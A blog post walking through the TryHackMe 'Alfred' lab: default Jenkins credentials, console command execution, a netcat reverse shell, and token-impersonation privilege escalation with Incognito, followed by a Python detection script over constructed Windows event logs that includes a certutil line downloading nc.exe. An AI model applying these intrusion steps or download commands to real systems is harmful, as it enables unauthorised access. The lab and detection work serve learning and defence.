TryHackme: Alfred — Writeup

Israel Aráoz Severiche
4 min read, May 13, 2020

Step by step without metasploit

Hi,

This is my first post after a long time, and the first in English.

Exploit Jenkins to gain an initial shell, then escalate your privileges by exploiting Windows authentication tokens.

Initial Access

Scanning

First, running nmap to check ports and services:

nmap -sV -A -Pn 5000 10.10.15.36 -T5

I got three open ports: 80, 8080 and 3389.

Just checking http://10.10.15.36, the following page appears:

Based on the title of the room, I went directly to http://10.10.15.36:8080. Honestly, I didn't try a brute-force attack: my first attempt was alfred as the user, then admin with password 123456, and lastly the famous admin / admin, and here we go!

Jenkins Control panel

TryHackMe gives you a couple of hints for finding code execution: first try with ipconfig, then build and check the console output.

Command Execution

I started a web server with Python to transfer files, executing the commands from the Jenkins console.

I used certutil to download netcat; it was copied to the temporary directory.

Command to transfer files

Successful transfer!

Run the following command to get a reverse shell:

Access gained!

Check user.txt.

Privilege Escalation

This room is focused on token impersonation, so I checked for the SeImpersonatePrivilege privilege.

The SeImpersonatePrivilege is described on MSDN as "User Right: Impersonate a client after authentication."

I used Incognito to escalate privileges.

Incognito v2.0 actually implements exploitation of one of these cases already. If an account is not an Administrative user but has been granted SeDebugPrivilege and SeImpersonatePrivilege then Incognito v2.0 will automatically enable these privileges and use them to gain access to all tokens and so effectively escalate the SYSTEM. I don't expect it will be particularly common to find this situation in practice but it may prove useful.

Source: https://labs.f-secure.com/archive/incognito-v2-0-released/

You can download it from:

I downloaded Incognito from my Kali machine.

Run incognito.exe list_tokens -u

I created a user.

The created user was added to the local Administrators group, thanks to Incognito v2.

User k1mura is now a local administrator.

Microsoft Terminal Services is enabled; logging in with k1mura and voila, I got root.txt.

We have access to root.txt
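From the defender's side, the chain above leaves a clear trail in Windows logs. The following is an added example (my own detection sketch, not part of the room or this writeup) that runs a few rules over constructed Sysmon process-creation and Security 4720/4732 events modelled on the steps in this post; the field names follow Sysmon and the Security log, while the sample values (host ALFRED, user bruce, 10.0.0.5) are assumptions.

```python
import json
# Constructed sample events (not from the page): Sysmon Event ID 1 (process
# creation) and Security Event IDs 4720/4732, flattened to one JSON object per line.
SAMPLE_LOG = r'''
{"EventID": 1, "Image": "C:\\Windows\\System32\\cmd.exe", "ParentImage": "C:\\Program Files (x86)\\Jenkins\\jre\\bin\\java.exe", "CommandLine": "cmd.exe /c ipconfig"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\certutil.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "certutil -urlcache -f http://10.0.0.5:8000/nc.exe C:\\Windows\\Temp\\nc.exe"}
{"EventID": 1, "Image": "C:\\Windows\\Temp\\nc.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "nc.exe"}
{"EventID": 4720, "SubjectUserName": "bruce", "TargetUserName": "k1mura"}
{"EventID": 4732, "SubjectUserName": "bruce", "TargetUserName": "Administrators", "MemberName": "ALFRED\\k1mura"}
'''

def parse_events(log_text):
    """One JSON object per line; blank or malformed lines are skipped, not fatal."""
    events = []
    for line in log_text.splitlines():
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue
    return events

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def detect(events):
    """Return (rule, detail) pairs, one per stage of the chain seen in the events."""
    findings = []
    for e in events:
        eid, img = e.get("EventID"), e.get("Image", "")
        parent, cmd = basename(e.get("ParentImage", "")), e.get("CommandLine", "").lower()
        # Jenkins runs as java.exe; it spawning a shell is normal for builds but is also the channel the console commands go through.
        if eid == 1 and parent == "java.exe" and basename(img) in ("cmd.exe", "powershell.exe"):
            findings.append(("jenkins_shell", cmd))
        # certutil with -urlcache is the classic living-off-the-land download.
        if eid == 1 and basename(img) == "certutil.exe" and "urlcache" in cmd:
            findings.append(("certutil_download", cmd))
        # Anything executed out of the Windows temp directory (nc.exe here).
        if eid == 1 and "\\windows\\temp\\" in img.lower():
            findings.append(("exec_from_temp", img))
        # 4720 = local account created; 4732 = member added to a local group.
        if eid == 4720:
            findings.append(("user_created", e.get("TargetUserName")))
        if eid == 4732 and e.get("TargetUserName", "").lower() == "administrators":
            findings.append(("added_to_admins", e.get("MemberName")))
    return findings

if __name__ == "__main__":
    for rule, detail in detect(parse_events(SAMPLE_LOG)):
        print(f"{rule:18} {detail}")
```

Real Sysmon/Security exports carry many more fields; the rules only rely on EventID, Image, ParentImage, CommandLine, TargetUserName and MemberName.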

Thanks!


{💀Cybersecurity Engineer​​🐞 } / { 🥋​ Purple Belt Brazilian Jiu Jitsu } / {🌐​https://twitter.com/iara0z}